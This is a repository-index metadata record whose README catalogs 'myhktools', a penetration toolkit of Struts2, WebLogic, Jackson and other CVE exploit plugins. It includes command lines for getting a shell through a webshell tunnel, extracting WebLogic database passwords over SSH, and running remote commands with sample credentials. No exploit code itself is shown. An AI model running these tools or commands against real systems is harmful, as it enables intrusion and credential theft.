{"id":13797352,"url":"https://github.com/GhostTroops/myhktools","last_synced_at":"2025-05-13T02:32:23.074Z","repository":{"id":65790639,"uuid":"580629797","full_name":"GhostTroops/myhktools","owner":"GhostTroops","description":"struts2全套Exp","archived":false,"fork":false,"pushed_at":"2023-07-11T23:04:27.000Z","size":4481,"stargazers_count":5,"open_issues_count":2,"forks_count":1,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-05-19T02:13:33.207Z","etag":null,"topics":["struts2-exp"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/GhostTroops.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-12-21T03:15:02.000Z","updated_at":"2024-04-07T02:13:45.000Z","dependencies_parsed_at":"2023-03-10T19:06:18.491Z","dependency_job_id":null,"html_url":"https://github.com/GhostTroops/myhktools","commit_stats":null,"previous_names":["ghosttroops/myhktools"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostTroops%2Fmyhktools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostTroops%2Fmyhktools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostTroops%2Fmyhktools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GhostTroops%2Fmyhktools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/GhostTroops","download_url":"https://codeload.github.com/GhostTroops/myhktools/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225167487,"owners_count":17431603,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["struts2-exp"],"created_at":"2024-08-03T23:01:28.405Z","updated_at":"2024-11-18T11:31:40.673Z","avatar_url":"https://github.com/GhostTroops.png","language":"Java","funding_links":["https://www.paypal.me/pwned2019"],"categories":["\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":[],"readme":"[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social\u0026label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social\u0026label=Follow)](https://github.com/hktalent/)\n[![Top Langs](https://profile-counter.glitch.me/hktalent/count.svg)](https://51pwn.com)\n\u003c!-- header --\u003e\n# penetration tools\n\u003c!--\n\n|\u003cimg src=\"https://github.com/hktalent/myhktools/blob/master/bin/hk1.jpg?raw=true\" width=400\u003e|\u003cimg src=\"https://github.com/ Hktalent/myhktools/blob/master/bin/hk2.jpg?raw=true\" width=400\u003e|\n|\u003cimg src=\"https://github.com/hktalent/myhktools/blob/master/bin/hk3.jpg?raw=true\" width=400\u003e|\u003cimg src=\"https://github.com/ Hktalent/myhktools/blob/master/bin/hk4.jpg?raw=true\" width=400\u003e|\n--\u003e\n\n## dependencies\n| Command | Description |\n| --- | --- |\n| kali linux | recommend system |\n| node js | program runtime |\n| javac, java | auto generate payload |\n| metasploit | auto generate payload, and autoexploit|\n| gcc | auto generate payload |\n| tmux | auto background send payload, shell |\nBash | base64, tr, nc, auto generate payload |\n| python | auto generate and send payload |\n\n## New features\n```\n# ssh2\nPy2 py/rforward.py -r 192.168.10.115:8083 -p 9999 -u root 12.19.16.11:27449\nCurl http://162.219.126.11:9999/QIMS/login.jsp -v\n\n# how use exploit CVE-2018-15982\n\nPy2 tools/replaceBin.py -i /mysvn/CVE-2018-15982_PoC.swf -o /mysvn/test.swf -c 'notepad.exe'\n\n# get bash shell,socks4 through http tunnel,auto use tmux and reGeorgSocksProxy.py\nTools/getBashShell_proxychains_http_tunnel.sh http://xxx:9002/uddi/.O01542895480635.jsp\n\n# check Xss\nCat /mysvn/new_url_list.txt|xargs -I % node tools/checkXss.js -v -u %\n# check svn paswd\nNode tools/checkSvn.js http://12.68.10.7:8090/svn/ userName Pswd\n\n# socks5\nNode tools/mySocks5.js --user mser --password W_x*d -p 15533\n\n#one key get weblogic passwd\nSsh -i YouKey userName@YouTargetIp -p targetPort \u003c tools/oneKeyGetSshWeblogicJdbcPswd.sh \u003eout.txt\n\n# port Forward\nNode tools/portForward.js -l 8080,3306 --rhost 172.17.0.2 -s 127.0.0.1 -p 8111\n\n# ssh cmd\nNode tools/ssh2Cmd.js --port 29156 --host 12.8.22.48 --username root --password '#$'\n\n# xss test\nCat /mysvn/xss.txt|grep -Eo \"http.*$\"|sort -u|xargs -I % node checkUrl.js -u % --tags xss\n\n# test all urls xss\nCat /mysvn/xx.sh|grep -Eo \"'([^']+)'\"|xargs -I % bash -c 'curl --connect-timeout 2 -Is % -o-| head -n 1| Grep -Eo \"(200|301)\" \u0026\u0026 node checkUrl.js -u % --tags xss'\n\n\n```\n## plugins\n|name|tags|dependencies|des|\n| --- | --- | --- | --- |\n|/bash/CVE-2014-6271.js|shellshock,web,CVE-2014-6271,rci|java,ysoserial,base64,tr|Shellshock Remote Command Injection (CVE-2014-6271)|\n|/GlassFish/4.1.0.js|glassfish,web||glassfish 4.1.0 Vulnerability detection|\n|/elasticsearch/CVE-2015-1427.js|elasticsearch,web,CVE-2015-1427|java,ysoserial,base64,tr|elasticsearch,web,CVE-2015-1427,RCE,ElasticSearch Groovy Sandbox bypass \u0026\u0026 code (CVE-2015-1427) test environment|\n|/elasticsearch/CVE-2014-3120.js|elasticsearch,web,CVE-2014-3120|java,ysoserial,base64,tr|elasticsearch,web,CVE-2014-3120,RCE|\n|/elasticsearch/CVE-2015-3337.js|CVE-2015-3337,||ElasticSearch Directory traversal vulnerability(CVE-2015-3337)test environment|\n|/flask/ssti.js|ssti,flask,parms||Flask(Jinja2) Server Template Injection Vulnerability|\n|/jackson/drupal_CVE-2018-7600.js|CVE-2018-7600, web, drupal|java, ysoserial, base64, tr|drupal, Vulnerability detection|\n|/jackson/CVE-2017-7525.js|jackson,web,CVE-2017-7525,CVE-2017-17485|java,ysoserial,base64,tr|CVE-2017-7525,Vulnerability detection,JDK7u21,CVE-2017 -17485|\n|/jackson/fastjson.js|fastjson,web,|java,ysoserial,base64,tr|fastjson,Vulnerability detection|\n|/http/attackhost.js|http,host,spoof,web||spoof host,Vulnerability detection|\n|/goahead/CVE-2017-17562.js|CVE-2017-17562,goahead,web|gcc,c lib,rm(/tmp/xx)|GoAhead Remote command execution vulnerability(CVE-2017-17562) Vulnerability detection|\n|/java/CVE-2017-5645_log4j.js|log4j,web,CVE-2017-5645|java,ysoserial,base64,nc|CVE-2017-5645,Vulnerability detection,log4j|\n|/java/CVE-2018-1297_jmeter.js|jmeter,CVE-2018-1297|java,ysoserial|jmeter,CVE-2018-1297,Vulnerability detection|\n|/jboss/CVE-2017-12149.js|jboss,CVE-2017-12149|java,ysoserial|jboss,CVE-2018-1297,Vulnerability detection|\n|/jdk/7u25.js|jre7,jdk7,jre1.7,jdk1.7,1.7,web,CVE-2013-0431,0431||jre7,jdk7,jre1.7,jdk1.7,1.7,webVulnerability detection, |\n|/smb/CVE-2017-7494.js|smb,win,CVE-2017-7494|java,ysoserial,base64,tr|smb,win,CVE-2017-7494,Vulnerability detection|\n|/spring/CVE-2018-1270.js|spring, CVE-2018-1270,1270,parms,web||spring CVE-2018-1270 RCEVulnerability detection,CVE-2018-1270: Remote Code Execution with spring-messaging|\n|/spring/cve-2017-4971.js|spring,cve-2017-4971,4917,parms,web|java,ysoserial,base64,tr|spring cve-2017-4971 RCEVulnerability detection,CVE-2017-4971: Remote Code Execution Vulnerability In The Spring Web Flow Framework|\n|/struts/001.js|struts2,001,ww-2030,2030,parms,web||WW-2030,struts2 001Vulnerability detection|\n|/struts/005.js|struts2,005,ww-3470,xw-641,641,3470,web||WW-3470,XW-641,struts2 005Vulnerability detection|\n|/struts/007.js|struts2,007,ww-3668,3668,parms||WW-3668,struts2 007Vulnerability detection|\n|/struts/008.js|struts2,008,ww-3729,3729,web||WW-3729,struts2 Vulnerability detection|\n|/struts/012.js|struts2,012,cve-2013-1965,parms,20131965||CVE-2013-1965,struts2 012Vulnerability detection|\n|/struts/009.js|struts2,009||struts2 Vulnerability detection|\n|/struts/013.js|struts2,013,parms||struts2 013Vulnerability detection|\n|/struts/015.js|struts2,015||struts2 015Vulnerability detection|\n|/struts/016.js|struts2,016||struts2 016Vulnerability detection|\n|/struts/019.js|struts2,019||struts2 019Vulnerability detection|\n|/struts/029.js|struts2,029,parms||struts2 029Vulnerability detection|\n|/struts/032.js|struts2,032||struts2 032Vulnerability detection|\n|/struts/037.js|struts2,037,cve-2016-4438,20164438||CVE-2016-4438,struts2 037Vulnerability detection|\n|/struts/045.js|web,struts2,045,cve-2017-5638,20175638||CVE-2017-5638,struts2 045Vulnerability detection|\n|/struts/033.js|struts2,033,cve-2016-3087,20163087||CVE-2016-3087,struts2 033Vulnerability detection|\n|/struts/046.js|struts2,046,cve-2017-5638,20175638||CVE-2017-5638,struts2 046Vulnerability detection|\n|/struts/048.js|struts2,048,cve-2017-9791,20179791,parms||CVE-2017-9791,struts2 048Vulnerability detection|\n|/struts/053.js|struts2,053,parms||struts2 053Vulnerability detection|\n|/struts/052.js|struts2,052||struts2 052Vulnerability detection,CVE-2017-9805|\n|/struts/054.js|struts2,052||struts2 052Vulnerability detection|\n|/struts/CVE-2016-100031.js|web,acf,CVE-2016-100031,fileupload,CVE-2013-2186|java,|CVE-2016-100031,CVE-2013-2186,Apache Commons FileUpload Vulnerability detection |\n|/struts/055.js|struts2,055,CVE-2017-7525,7525,parms|javac|struts2 055Vulnerability detection,|\n|/struts/057.js|web,struts2,057||CVE-2018-11776,struts2 057Vulnerability detection|\n|/struts/devMode.js|struts2,devMode||struts2 devModeVulnerability detection|\n|/struts/ognl.js|struts2,parms,ognl||struts2 052Vulnerability detection|\n|/struts/pythonBc.js|struts2, python|python,struts-scan.py|struts2 python script Vulnerability detection supplement|\n|/tomcat/CVE-2016-6816.js|tomcat,CVE-2016-6816||Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability Vulnerability detection|\n|/tomcat/CVE-2017-12616.js|tomcat,CVE-2017-12616,12616,CVE-2017-12617||tomcat,Vulnerability detection|\n|/weblogic/SSRF.js|ssrf, weblogic, uddi, xspa||SSRF Open State Monitoring, CVE-2014-4210, UDDI Explorer, CVE-2014-4241, CVE-2014-4242)|\n|/weblogic/201710271.js|weblogic,CVE-2017-10271,10271,3506|payload/[x.jsp,*.sh],msfvenom,curl|CVE-2017-10271,weblogic CVE-2017-10271,CVE -2017-3506Vulnerability detection|\n|/weblogic/t3.js|t3, weblogic||T3 open state monitoring|\n|/xss/xss1.js|xss,parms,web||xx,Vulnerability detection|\n\n\n## how install\n```\n# mac os\nBrew install node\n# linux\nApt install nodejs node\nYum install nodejs node\n\nMkdir ~/safe \u0026\u0026 cd ~/safe\nGit clone https://github.com/hktalent/myhktools.git\nCd myhktools\nSh ./install.sh\nNode checkUrl.js -h\n```\n\n## update all node js lib\n```\nVi ~/npm-upgrade.sh\n\n#!/bin/sh\nSet -e\n#set -x\nFor package in $(npm -g outdated --parseable --depth=0 | cut -d: -f2)\nDo\n    Npm -g install \"$package\"\nDone\n```\n## upgrade all npm\n```\nSh ~/npm-upgrade.sh\n```\n## how use\nNode checkUrl.js -h\n```\nUsage: checkUrl [options]\n\n  Options:\n\n    -V, --version output the version number\n    -u, --url [value] check url, no default\n    -p, --proxy [value] http proxy,eg: http://127.0.0.1:8080, or https://127.0.0.1:8080, no default, set the proxy\n    -t, --t3 [value] check weblogic t3, default false, check the T3 protocol, you can specify a list of file names to detect\n    -i, --install install node modules,run: npm install\n    -v, --verbose show logs\n    -w, --struts2 [value] struts2 type,eg: 045\n    -C, --cmd [value] cmd type,eg: \"ping -c 3 www.baidu.com\"\n    -o, --timeout default 5000\n    -l, --pool default 300\n    -r, --test test\n    -x, --proxy http://127.0.0.1:8800\n    -m, --menu [value] scan url + menus, default ./urls/ta3menu.txt\n    -s, --webshell [value] scan webshell url, set parameters will run, default ./urls/webshell.txt\n    -d, --method [value] default PUT, DELETE, OPTIONS, HEAD, PATCH test\n    -a, --host host attack test, this function may not be available after setting the proxy, default true\n    -k, --keys [value] scan html keywords, default ./urls/keywords\n    -h, --help output usage information\n\nNode checkUrl.js -u http://192.168.10.216:8082/s2-032/ --struts2 045\n\n............\n\n```\n\n\u003c!--\n\n\u003cimg src=\"https://github.com/hktalent/myhktools/blob/master/bin/wb1.jpg?raw=true\" width=400\u003e\n--\u003e\n\n\u003c!-- ender --\u003e\n# Donation\n# Donation\n| Wechat Pay | AliPay | Paypal | BTC Pay |BCH Pay |\n| --- | --- | --- | --- | --- |\n|\u003cimg src=https://github.com/hktalent/myhktools/blob/master/md/wc.png\u003e|\u003cimg width=166 src=https://github.com/hktalent/myhktools/blob/master/md/zfb.png\u003e|[paypal](https://www.paypal.me/pwned2019) **miracletalent@gmail.com**|\u003cimg width=166 src=https://github.com/hktalent/myhktools/blob/master/md/BTC.png\u003e|\u003cimg width=166 src=https://github.com/hktalent/myhktools/blob/master/md/BCH.jpg\u003e|\n\n# Thanks to\n- [![Follow on Twitter](https://img.shields.io/twitter/follow/hanerkui.svg?style=social\u0026label=Follow)](https://twitter.com/intent/follow?screen_name=hanerkui ) github: [hanerkui] (https://github.com/hanerkui)\n- [![Follow on Twitter](https://img.shields.io/twitter/follow/pwncrestfallen.svg?style=social\u0026label=Follow)](https://twitter.com/intent/follow?screen_name=pwncrestfallen ) github:[musicalpike](https://github.com/musicalpike)\n- [![Follow on Twitter](https://img.shields.io/twitter/follow/tiger_mirror.svg?style=social\u0026label=Follow)](https://twitter.com/intent/follow?screen_name=tiger_mirror ) github: [black-mirror](https://github.com/black-mirror)\n- [![Follow on Twitter](https://img.shields.io/twitter/follow/Arthur22573102.svg?style=social\u0026label=Follow)](https://twitter.com/intent/follow?screen_name=Arthur22573102 ) github: [EnterpriseForever] (https://github.com/EnterpriseForever)\n\n \n# 先知论坛推荐过本项目“2.1.3 Web 框架”\nhttps://xz.aliyun.com/t/2354?page=34\n# myhktools\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FGhostTroops%2Fmyhktools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FGhostTroops%2Fmyhktools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FGhostTroops%2Fmyhktools/lists"}